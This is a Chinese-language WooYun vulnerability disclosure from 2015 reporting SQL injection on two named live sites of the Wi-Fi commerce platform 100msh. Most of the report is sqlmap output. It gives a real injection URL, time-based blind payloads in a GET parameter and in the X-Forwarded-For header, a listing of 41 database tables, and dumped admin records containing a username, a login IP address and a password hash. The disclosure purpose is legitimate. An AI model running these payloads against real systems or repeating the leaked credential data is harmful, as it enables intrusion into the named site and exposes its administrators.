漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0104645
漏洞标题:百米生活多站点SQL注射漏洞
相关厂商:百米生活
漏洞作者: crypt
提交时间:2015-03-31 15:19
修复时间:2015-05-15 15:20
公开时间:2015-05-15 15:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-15: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
百米生活,通过免费商业Wi-Fi的铺设,在全国各城市打造一个基于本地化社区的电子商务服务平台,为商家提供产品推广、品牌宣传、商家管理及成本控制等服务;为消费者带来社区附近衣食住行、吃喝玩乐的信息服务,同时借助免费Wi-Fi技术支持,开启移动互联网的全新生活方式。
shop.100msh.com和m.100msh.com站点存在SQL注射漏洞,可拖库。shop.100msh.com
注入点:http://shop.100msh.com/index/set_area?area_id=57
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: area_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: area_id=57' AND (SELECT * FROM (SELECT(SLEEP(5)))MUWQ) AND 'rStO'='rStO
---
back-end DBMS: MySQL >= 5.0.0
Database: 100msh_admin
Table: anl_admin_users
[5 entries]
+---------+----------+----------+----------+-----------+-----------+------------+-----------------------------------------+------------------+-------------+-------------+-------------+-------------+----------------------------------------------------------------+--------------+--------------+--------------+--------------+---------------+-----------------+------------------+---------------+----------------------------------+-----------------+------------------+
| user_id | group_id | user_img | is_email | is_mobile | user_name | user_phone | user_chats | user_email | user_fax_no | user_gender | user_status | user_mobile | user_address | user_zipcode | user_regdate | user_cert_no | cash_account | user_birthday | last_login_ip | user_realname | point_account | user_password | last_login_time | second_level_pwd |
+---------+----------+----------+----------+-----------+-----------+------------+-----------------------------------------+------------------+-------------+-------------+-------------+-------------+----------------------------------------------------------------+--------------+--------------+--------------+--------------+---------------+-----------------+------------------+---------------+----------------------------------+-----------------+------------------+
| 1 | 3 | 0 | 0 | 0 | wzw | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 113.88.238.245 | SupserRoot | 0 | a87a7a8701db961210ab6ef55ad9ac3c | 1396010502 | |
| 2 | 3 | 0 | 0 | 0 | admin | | a:2:{s:3:"MSN";s:0:"";s:2:AQQ";s:0:"";} | tiqer@100mshAcom | 0 | 1 | 1 |
0 | |
+---------+----------+----------+----------+-----------+-----------+------------+-----------------------------------------+------------------+-------------+-------------+-------------+-------------+----------------------------------------------------------------+--------------+--------------+--------------+--------------+---------------+-----------------+------------------+---------------+----------------------------------+-----------------+------------------+
m.100msh.com
X-Forwarded-For头注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: X-Forwarded-For #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: 8.8.8.8' AND (SELECT * FROM (SELECT(SLEEP(5)))wsmC) AND 'iDga'='iDga
---
back-end DBMS: MySQL >= 5.0.0
Database: 100msh_partner
[41 tables]
+----------------------------------+
| anl_accessrights |
| anl_admin_access_token |
| anl_admin_minUsers_tmp |
| anl_admin_pos |
| anl_admin_users |
| anl_admin_users_bak |
| anl_login_log |
| anl_partner |
| anl_partner_addition |
| anl_partner_cateqory |
| anl_partner_credit_operation_log |
| anl_partner_credit_points |
| anl_partner_ctag |
| anl_partner_ctag_rel |
| anl_partner_gallery |
| anl_partner_info_aueit |
| anl_partner_level |
| anl_partner_level_rule |
| anl_partner_linyi_osg |
| anl_partner_log |
| anl_partner_peportqd |
| anl_partner_policy |
| anl_partner_policy_domp |
| anl_partner_policy_level |
| anl_partner_prefereqtial |
| anl_partner_prefereqtial_count |
| anl_partner_search_config |
| anl_partner_search_keyword |
| anl_partner_tag_rem |
| anl_partner_tpl_cfg |
| anl_partner_user_search_keyword |
| anl_partner_views |
| anl_partner_views_num_info_all |
| anl_partner_views_nuo_info |
| anl_posadcess |
| anl_positions |
| anl_statecity |
| anl_tag |
| anl_tmp_cmp_msg_rel |
| anl_tmp_wx_partner_msg |
| anl_watermark |
+----------------------------------+
漏洞证明:
back-end DBMS: MySQL >= 5.0.0
Database: 100msh_admin
Table: anl_admin_users
[5 entries]
+---------+----------+----------+----------+-----------+-----------+------------+-----------------------------------------+------------------+-------------+-------------+-------------+-------------+----------------------------------------------------------------+--------------+--------------+--------------+--------------+---------------+-----------------+------------------+---------------+----------------------------------+-----------------+------------------+
| user_id | group_id | user_img | is_email | is_mobile | user_name | user_phone | user_chats | user_email | user_fax_no | user_gender | user_status | user_mobile | user_address | user_zipcode | user_regdate | user_cert_no | cash_account | user_birthday | last_login_ip | user_realname | point_account | user_password | last_login_time | second_level_pwd |
+---------+----------+----------+----------+-----------+-----------+------------+-----------------------------------------+------------------+-------------+-------------+-------------+-------------+----------------------------------------------------------------+--------------+--------------+--------------+--------------+---------------+-----------------+------------------+---------------+----------------------------------+-----------------+------------------+
| 1 | 3 | 0 | 0 | 0 | wzw | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
+---------+----------+----------+----------+-----------+-----------+------------+-----------------------------------------+------------------+-------------+-------------+-------------+-------------+----------------------------------------------------------------+--------------+--------------+--------------+--------------+---------------+-----------------+------------------+---------------+----------------------------------+-----------------+------------------+
back-end DBMS: MySQL >= 5.0.0
Database: 100msh_partner
[41 tables]
+----------------------------------+
| anl_accessrights |
| anl_admin_access_token |
| anl_admin_minUsers_tmp |
| anl_admin_pos |
| anl_admin_users |
| anl_admin_users_bak |
| anl_login_log |
| anl_partner |
| anl_partner_addition |
| anl_partner_cateqory |
| anl_partner_credit_operation_log |
| anl_partner_credit_points |
| anl_partner_ctag |
| anl_partner_ctag_rel |
| anl_partner_gallery |
| anl_partner_info_aueit |
| anl_partner_level |
| anl_partner_level_rule |
| anl_partner_linyi_osg |
| anl_partner_log |
| anl_partner_peportqd |
| anl_partner_policy |
| anl_partner_policy_domp |
| anl_partner_policy_level |
| anl_partner_prefereqtial |
| anl_partner_prefereqtial_count |
| anl_partner_search_config |
| anl_partner_search_keyword |
| anl_partner_tag_rem |
| anl_partner_tpl_cfg |
| anl_partner_user_search_keyword |
| anl_partner_views |
| anl_partner_views_num_info_all |
| anl_partner_views_nuo_info |
| anl_posadcess |
| anl_positions |
| anl_statecity |
| anl_tag |
| anl_tmp_cmp_msg_rel |
| anl_tmp_wx_partner_msg |
| anl_watermark |
+----------------------------------+
修复方案:
转义,过滤
版权声明:转载请注明来源 crypt@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝